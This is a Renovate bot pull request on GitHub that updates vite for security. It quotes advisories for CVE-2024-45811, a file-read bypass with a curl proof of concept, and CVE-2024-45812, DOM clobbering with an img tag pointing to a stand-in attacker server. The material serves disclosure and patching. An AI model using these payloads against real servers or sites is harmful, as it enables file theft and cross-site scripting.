Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update dependency vite to v3 [security] #74

Open
wants to merge 1 commit into
base: main
Choose a base branch
from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Sep 18, 2024

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vite (source) ^2.9.13 -> ^3.2.11 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@​fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

CVE-2024-45812

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)
// extra.js
export default "https://myserver/justAnOther.js"
// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

Release Notes

vitejs/vite (vite)

v3.2.11

Compare Source

Please refer to CHANGELOG.md for details.

v3.2.10

Compare Source

Please refer to CHANGELOG.md for details.

v3.2.8

Compare Source

Please refer to CHANGELOG.md for details.

v3.2.7

Compare Source

Please refer to CHANGELOG.md for details.

v3.2.6

Compare Source

v3.2.5

Compare Source

v3.2.4

Compare Source

v3.2.3

Compare Source

v3.2.2

Compare Source

v3.2.1

Compare Source

v3.2.0

Compare Source

Main Changes
Multiple Entries for Library Mode

Library mode now supports multiple entries:

  lib: {
    entry: {
        primary: 'src/index.ts',
        secondary: 'src/secondary.ts'
    },
    formats: ['es', 'cjs']
  }
  // => primary.es.js, primary.cjs.js, secondary.es.js, secondary.cjs.js

Check out the PR #​7047, and the build.lib config docs

build.modulePreload options

Vite now allows filtering and modifying module preload dependencies for each entry and async chunk. experimental.renderBuiltUrl will also get called for preload asset paths. And build.modulePreload.resolveDependencies will be called both for JS dynamic imports preload lists and also for HTML preload lists for chunks imported from entry HTML files. Refer to the PR for more context #​9938 and check out the modulePreload config docs. Note: build.modulePreloadPolyfill is now deprecated, please migrate to build.modulePreload.polyfill.

Include Duplicate Assets in the Manifest

Laravel and other backends integrations will now get entries for every asset file, even if they have been de-duplicated. See #​9928 for more information.

Customizable ErrorOverlay

You can now customize the ErrorOverlay by using css parts. Check out the PR for more details: #​10234.

Features
Bug Fixes
Previous Changelogs
3.2.0-beta.4 (2022-10-24)

See 3.2.0-beta.4 changelog

3.2.0-beta.3 (2022-10-20)

See 3.2.0-beta.3 changelog

3.2.0-beta.2 (2022-10-14)

See 3.2.0-beta.2 changelog

3.2.0-beta.1 (2022-10-10)

See 3.2.0-beta.1 changelog

3.2.0-beta.0 (2022-10-05)

See 3.2.0-beta.0 changelog

v3.1.8

Compare Source

Please refer to CHANGELOG.md for details.

v3.1.7

Compare Source

Please refer to CHANGELOG.md for details.

v3.1.6

Compare Source

Please refer to CHANGELOG.md for details.

v3.1.5

Compare Source

Please refer to CHANGELOG.md for details.

v3.1.4

Compare Source

Please refer to CHANGELOG.md for details.

v3.1.3

Compare Source

v3.1.2

Compare Source

v3.1.1

Compare Source

v3.1.0

Compare Source

Main Changes
  • Vite now uses parse5, which parses HTML in the same way as the latest browser versions. This migration gives us a more robust HTML story moving forward (#​9678).
  • Vite now supports using objects as hooks to change execution order (#​9634). Check out the RFC and the implementation upstream at rollup/rollup#4600 for details and rationale.
      import { resolve } from 'node:path';
      import { readdir } from 'node:fs/promises';
    
      export default function getFilesOnDisk() {
        return {
          name: 'getFilesOnDisk',
          writeBundle: {
            // run this hook sequentially even if the hook is parallel
            sequential: true,
            // push this hook to the 'post' stage, after all normal hooks
            order: 'post',
            // hook implementation
            async handler({ dir }) {
              const topLevelFiles = await readdir(resolve(dir))
              console.log(topLevelFiles)
            }
          }
        }
      }
    Read the updated Rollup Plugin docs for more information.

Note
After Vite 3.1, you are no longer going to see [vite] hot updated log messages in the browser console. These messages have been moved to the debug channel (#​8855). Check your browser docs to show debug logs.

Features
Bug Fixes

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 5bb24d8 to ec0778b Compare September 26, 2024 20:12
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v5 [security] Sep 26, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from ec0778b to e6101f8 Compare September 26, 2024 21:54
@renovate renovate bot changed the title chore(deps): update dependency vite to v5 [security] chore(deps): update dependency vite to v3 [security] Sep 26, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from e6101f8 to ed35ff6 Compare September 30, 2024 04:41
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v5 [security] Sep 30, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from ed35ff6 to 3bea14e Compare September 30, 2024 06:12
@renovate renovate bot changed the title chore(deps): update dependency vite to v5 [security] chore(deps): update dependency vite to v3 [security] Sep 30, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 3bea14e to 2d0a016 Compare September 30, 2024 06:12
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v5 [security] Sep 30, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 2d0a016 to f31c0cf Compare September 30, 2024 12:26
@renovate renovate bot changed the title chore(deps): update dependency vite to v5 [security] chore(deps): update dependency vite to v3 [security] Sep 30, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from f31c0cf to d3c9556 Compare October 9, 2024 08:16
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v5 [security] Oct 9, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from d3c9556 to 1bb9532 Compare October 9, 2024 09:53
@renovate renovate bot changed the title chore(deps): update dependency vite to v5 [security] chore(deps): update dependency vite to v3 [security] Oct 9, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 1bb9532 to 335c7dc Compare October 14, 2024 04:53
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v5 [security] Oct 14, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 335c7dc to a7e7ea4 Compare October 14, 2024 06:37
@renovate renovate bot changed the title chore(deps): update dependency vite to v5 [security] chore(deps): update dependency vite to v3 [security] Oct 14, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from a7e7ea4 to d0985a8 Compare October 21, 2024 03:50
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v5 [security] Oct 21, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from d0985a8 to 731276c Compare October 21, 2024 06:11
@renovate renovate bot changed the title chore(deps): update dependency vite to v5 [security] chore(deps): update dependency vite to v3 [security] Oct 21, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 731276c to 04156f9 Compare October 21, 2024 06:11
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v5 [security] Oct 21, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 04156f9 to 9a98fc2 Compare October 21, 2024 09:26
@renovate renovate bot changed the title chore(deps): update dependency vite to v5 [security] chore(deps): update dependency vite to v3 [security] Oct 21, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 9a98fc2 to 37db7d7 Compare October 21, 2024 09:27
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v5 [security] Oct 21, 2024
@renovate renovate bot changed the title chore(deps): update dependency vite to v6 [security] chore(deps): update dependency vite to v3 [security] Dec 16, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 17c76a8 to 6370691 Compare December 16, 2024 07:02
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v6 [security] Dec 16, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 6370691 to 908d576 Compare December 16, 2024 09:02
@renovate renovate bot changed the title chore(deps): update dependency vite to v6 [security] chore(deps): update dependency vite to v3 [security] Dec 16, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 908d576 to 8070c72 Compare December 16, 2024 09:02
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v6 [security] Dec 16, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 8070c72 to f46a7b2 Compare December 16, 2024 12:24
@renovate renovate bot changed the title chore(deps): update dependency vite to v6 [security] chore(deps): update dependency vite to v3 [security] Dec 16, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from f46a7b2 to 84e774c Compare December 17, 2024 19:15
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v6 [security] Dec 17, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 84e774c to a9fdcd6 Compare December 17, 2024 21:33
@renovate renovate bot changed the title chore(deps): update dependency vite to v6 [security] chore(deps): update dependency vite to v3 [security] Dec 17, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from a9fdcd6 to 9398a01 Compare December 22, 2024 17:11
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v6 [security] Dec 22, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 9398a01 to a795cc5 Compare December 22, 2024 19:40
@renovate renovate bot changed the title chore(deps): update dependency vite to v6 [security] chore(deps): update dependency vite to v3 [security] Dec 22, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from a795cc5 to 582ae69 Compare December 23, 2024 03:30
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v6 [security] Dec 23, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 582ae69 to e5348c0 Compare December 23, 2024 06:27
@renovate renovate bot changed the title chore(deps): update dependency vite to v6 [security] chore(deps): update dependency vite to v3 [security] Dec 23, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from e5348c0 to 24a6a18 Compare December 23, 2024 06:27
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v6 [security] Dec 23, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 24a6a18 to 5585b7b Compare December 23, 2024 09:36
@renovate renovate bot changed the title chore(deps): update dependency vite to v6 [security] chore(deps): update dependency vite to v3 [security] Dec 23, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 5585b7b to 83b801a Compare December 23, 2024 09:36
@renovate renovate bot changed the title chore(deps): update dependency vite to v3 [security] chore(deps): update dependency vite to v6 [security] Dec 23, 2024
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 83b801a to e3b5b0a Compare December 23, 2024 14:11
@renovate renovate bot changed the title chore(deps): update dependency vite to v6 [security] chore(deps): update dependency vite to v3 [security] Dec 23, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants